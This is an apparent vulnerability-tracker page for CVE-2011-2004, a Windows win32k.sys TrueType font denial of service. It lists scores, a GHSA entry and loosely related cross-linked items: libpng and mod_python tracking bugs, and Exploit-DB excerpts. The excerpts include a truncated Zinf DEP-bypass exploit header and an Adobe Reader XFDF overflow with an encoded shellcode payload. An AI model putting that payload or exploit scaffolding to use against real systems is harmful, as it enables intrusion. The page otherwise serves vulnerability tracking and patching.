CVE-2011-2004
published 2011-11-08CVE-2011-2004: Array index error in win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows remote attackers to…
PriorityP338high7.1CVSS 2.0
AVNACMAuNCNINAC
EPSS
24.62%
97.6th percentile
Array index error in win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (reboot) via a crafted TrueType font file, aka "TrueType Font Parsing Vulnerability," a different vulnerability than CVE-2011-3402.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_server_2008 | — | — |
CVSS provenance
nvdv2.07.1HIGHAV:N/AC:M/Au:N/C:N/I:N/A:C
vendor_redhat5.0MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-mfgm-v8rv-75rw: Array index error in win32k
ghsa_unreviewed·2022-05-13·CVSS 8.8
CVE-2011-2004 [HIGH] CWE-20 GHSA-mfgm-v8rv-75rw: Array index error in win32k
Array index error in win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (reboot) via a crafted TrueType font file, aka "TrueType Font Parsing Vulnerability," a different vulnerability than CVE-2011-3402.
Red Hat
libpng: regression of CVE-2004-0421 in 1.2.23+
vendor_redhat·2011-06-07·CVSS 5.0
CVE-2011-2501 [MEDIUM] libpng: regression of CVE-2004-0421 in 1.2.23+
libpng: regression of CVE-2004-0421 in 1.2.23+
The png_format_buffer function in pngerror.c in libpng 1.0.x before 1.0.55, 1.2.x before 1.2.45, 1.4.x before 1.4.8, and 1.5.x before 1.5.4 allows remote attackers to cause a denial of service (application crash) via a crafted PNG image that triggers an out-of-bounds read during the copying of error-message data. NOTE: this vulnerability exists because of a CVE-2004-0421 regression. NOTE: this is called an off-by-one error by some sources.
No detection rules found.
Exploit-DB
Beckhoff TwinCAT 2.11.0.2004 - Denial of Service
exploitdb·2011-09-14
CVE-2011-3486 Beckhoff TwinCAT 2.11.0.2004 - Denial of Service
Beckhoff TwinCAT 2.11.0.2004 - Denial of Service
---
#######################################################################
Luigi Auriemma
Application: Beckhoff TwinCAT
http://www.beckhoff.de/twincat/
Versions: <= 2.11.0.2004
Platforms: Windows
Bug: Denial of Service
Exploitation: remote
Date: 13 Sep 2011
Author: Luigi Auriemma
e-mail: [email protected]
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
1) Introduction
From vendor's website:
"The Beckhoff TwinCAT software system turns almost any compatible PC
into a real-time controller with a multi-PLC system, NC axis control,
programming environment and operating station."
Exploit-DB
Zinf Audio Player 2.2.1 - '.pls' Local Buffer Overflow (DEP Bypass)
exploitdb·2011-08-03
CVE-2004-0964 Zinf Audio Player 2.2.1 - '.pls' Local Buffer Overflow (DEP Bypass)
Zinf Audio Player 2.2.1 - '.pls' Local Buffer Overflow (DEP Bypass)
---
#!/usr/bin/ruby
#
#[+]Exploit Title: Zinf Audio Player v2.2.1 PLS File Buffer Overflow Vulnerability(DEP BYPASS)
#[+]Date: 03\08\2011
#[+]Author: C4SS!0 and h1ch4m
#[+]Found by: Delikon(http://www.exploit-db.com/exploits/559/) or also Metasploit(http://www.exploit-db.com/exploits/16688)
#[+]Software Link: http://sourceforge.net/projects/zinf/files/zinf/2.2.1/zinf-setup-2.2.1.exe/download
#[+]Version: 2.2.1
#[+]Tested on: Windows XP SP3 Brazilian Portuguese(DEP in AlwaysOn)
#[+]CVE: N/A
#
#
#Exploit Based in Corelan Team Tuturial https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/
#LoadLibraryA("msvcr71.dll") + VirtualProtect()
#
sys = `ver`
if sys =~/Windows/
system("cl
Exploit-DB
Adobe Reader 5.1 - XFDF Buffer Overflow (SEH)
exploitdb·2011-07-04
CVE-2004-0194 Adobe Reader 5.1 - XFDF Buffer Overflow (SEH)
Adobe Reader 5.1 - XFDF Buffer Overflow (SEH)
---
# Exploit Title: Adobe Reader 5.1 XFDF Buffer Overflow Vulnerability (SEH)
# Google Dork: N/A or filtype ".xfdf"
# Date: 04/01/2011
# Author: [email protected] / http://extraexploit.blogspot.com
# Software Link: http://www.oldversion.com/download/acrobat51.exe
# Version: Acrobat (formerly Adobe) Reader 5.1
# Tested on: XP SP3
# CVE : cve-2004-0194
# http://extraexploit.blogspot.com/2011/07/old-bug-for-new-job-cve-2004-0194.html
.AAAAAAAAAAAAAAAAAAAAAAAAAAT]ÚÞÙuô_WYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLZHK9GpC0GpQpK9IuTqN2PdNkQBTpLKCbTLLKV2EDNkCBQ8VoOGRjTfVQIoEaIPNLGLQqQlC2TlGPO1ZoVmC1XGKRL0V2QGLKRrR0LKG2GLC1ZpNkG0QhK5IPQdPJEQN0RpNkCxR8LKChQ0EQZsXcGLPINkVTNkVaIFEaIoP1O0LlIQZoTMC1KwEhIpPuIdGsCMIhEkQmQ4T5IrChNkQHVDEQICRF
Exploit-DB
Microsoft Host Integration Server 2004-2010 - Remote Denial of Service
exploitdb·2011-04-11
CVE-2011-2007 Microsoft Host Integration Server 2004-2010 - Remote Denial of Service
Microsoft Host Integration Server 2004-2010 - Remote Denial of Service
---
source: https://www.securityfocus.com/bid/49997/info
Microsoft Host Integration Server is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to cause the application to become unresponsive or to crash, denying service to legitimate users.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36211.zip
Bugzilla
CVE-2011-2501 libpng: regression of CVE-2004-0421 in 1.2.23+ [epel-6]
bugzilla·2011-06-29·CVSS 5.0
CVE-2011-2501 [MEDIUM] CVE-2011-2501 libpng: regression of CVE-2004-0421 in 1.2.23+ [epel-6]
CVE-2011-2501 libpng: regression of CVE-2004-0421 in 1.2.23+ [epel-6]
epel-6 tracking bug for libpng10: see blocks bug list for full details of the security issue(s).
This bug is never intended to be made public, please put any public notes
in the 'blocks' bugs.
[bug automatically created by: add-tracking-bugs]
Discussion:
mingw32-libpng-1.2.37-3.el6 has been submitted as an update for Fedora EPEL 6.
https://admin.fedoraproject.org/updates/mingw32-libpng-1.2.37-3.el6
---
libpng10-1.0.54-3.el6 has been submitted as an update for Fedora EPEL 6.
https://admin.fedoraproject.org/updates/libpng10-1.0.54-3.el6
---
Package mingw32-libpng-1.2.37-3.el6:
* should fix your issue,
* was pushed to the Fedora EPEL 6 testing repository,
* should be available at your local mirror within two days.
Bugzilla
CVE-2011-2501 libpng: regression of CVE-2004-0421 in 1.2.23+ [fedora-all]
bugzilla·2011-06-29·CVSS 5.0
CVE-2011-2501 [MEDIUM] CVE-2011-2501 libpng: regression of CVE-2004-0421 in 1.2.23+ [fedora-all]
CVE-2011-2501 libpng: regression of CVE-2004-0421 in 1.2.23+ [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected Fedora
versions.
For comments that are specific to the vulnerability please use bugs filed
against "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please include the bug IDs of the
respective parent bugs filed against the "Security Response" product.
Please mention CVE ids in the RPM changelog when available.
Bodhi update submission link:
https://admin.fedoraproject.org/updates/new/?type_=security&bugs=717084
Please note: this issue affects multiple
Bugzilla
CVE-2011-2501 libpng: regression of CVE-2004-0421 in 1.2.23+ [epel-5]
bugzilla·2011-06-29·CVSS 5.0
CVE-2011-2501 [MEDIUM] CVE-2011-2501 libpng: regression of CVE-2004-0421 in 1.2.23+ [epel-5]
CVE-2011-2501 libpng: regression of CVE-2004-0421 in 1.2.23+ [epel-5]
epel-5 tracking bug for mingw32-libpng: see blocks bug list for full details of the security issue(s).
This bug is never intended to be made public, please put any public notes
in the 'blocks' bugs.
[bug automatically created by: add-tracking-bugs]
Discussion:
mingw32-libpng-1.2.37-2.el5 has been submitted as an update for Fedora EPEL 5.
https://admin.fedoraproject.org/updates/mingw32-libpng-1.2.37-2.el5
---
mingw32-libpng-1.2.37-3.el6 has been submitted as an update for Fedora EPEL 6.
https://admin.fedoraproject.org/updates/mingw32-libpng-1.2.37-3.el6
---
Package mingw32-libpng-1.2.37-2.el5:
* should fix your issue,
* was pushed to the Fedora EPEL 5 testing repository,
* should be available at your local mirro
Bugzilla
CVE-2011-2501 libpng: regression of CVE-2004-0421 in 1.2.23+ [fedora-all]
bugzilla·2011-06-29·CVSS 5.0
CVE-2011-2501 [MEDIUM] CVE-2011-2501 libpng: regression of CVE-2004-0421 in 1.2.23+ [fedora-all]
CVE-2011-2501 libpng: regression of CVE-2004-0421 in 1.2.23+ [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected Fedora
versions.
For comments that are specific to the vulnerability please use bugs filed
against "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please include the bug IDs of the
respective parent bugs filed against the "Security Response" product.
Please mention CVE ids in the RPM changelog when available.
Bodhi update submission link:
https://admin.fedoraproject.org/updates/new/?type_=security&bugs=717084
Please note: this issue affects multiple
Bugzilla
CVE-2011-2501 libpng: regression of CVE-2004-0421 in 1.2.23+
bugzilla·2011-06-27·CVSS 5.0
CVE-2011-2501 [MEDIUM] CVE-2011-2501 libpng: regression of CVE-2004-0421 in 1.2.23+
CVE-2011-2501 libpng: regression of CVE-2004-0421 in 1.2.23+
It was reported [1] that the fix for CVE-2004-0421 in libpng was inadvertently reverted during the 1.2.23 development cycle. The original flaw could be used to cause a denial of service via a carefully-crafted PNG image.
This would affect all versions of libpng >=1.2.23, including 1.4.x and 1.5.x.
[1] http://sourceforge.net/mailarchive/forum.php?thread_name=BANLkTikrnU6FJNQYFvwmt78hwpgKPVRd1Q%40mail.gmail.com&forum_name=png-mng-implement
Discussion:
Upstream fix is here:
http://libpng.git.sourceforge.net/git/gitweb.cgi?p=libpng/libpng;a=commitdiff;h=65e6d5a34f49acdb362a0625a706c6b914e670af
---
This has been assigned CVE-2011-2501:
http://www.openwall.com/lists/oss-security/2011/06/28/16
---
Created libpng tracking bugs
Bugzilla
CVE-2004-2680 mod_python arbitrary data disclosure flaw
bugzilla·2007-12-20·CVSS 5.0
CVE-2004-2680 [MEDIUM] CVE-2004-2680 mod_python arbitrary data disclosure flaw
CVE-2004-2680 mod_python arbitrary data disclosure flaw
------- Comment From [email protected] 2011-01-31 15:05 EDT-------
Did this make it into 4.9?
------- Comment From [email protected] 2011-02-17 17:27 EDT-------
Since I don't see an updated mod_python package on RHN in the RHEL 4 beta channel, I don't expect this made 4.9 after all. The original submitter seems to have left IBM somewhere along the four years this bug was around though I am sure we can probably find someone else to verify the fix if there is one. For the moment, I am closing this as WILL_NOT_FIX. Thanks.
Discussion:
Hello,
This is currently in accepted state for RHEL 4.9.
Thank You
Joe Kachuck
---
(In reply to comment #12)
> This is currently in accepted state for RHEL 4.9.
This bug is *proposed* for
http://www.kb.cert.org/vuls/id/675073https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-084https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14133http://www.kb.cert.org/vuls/id/675073https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-084https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14133
2011-11-08
Published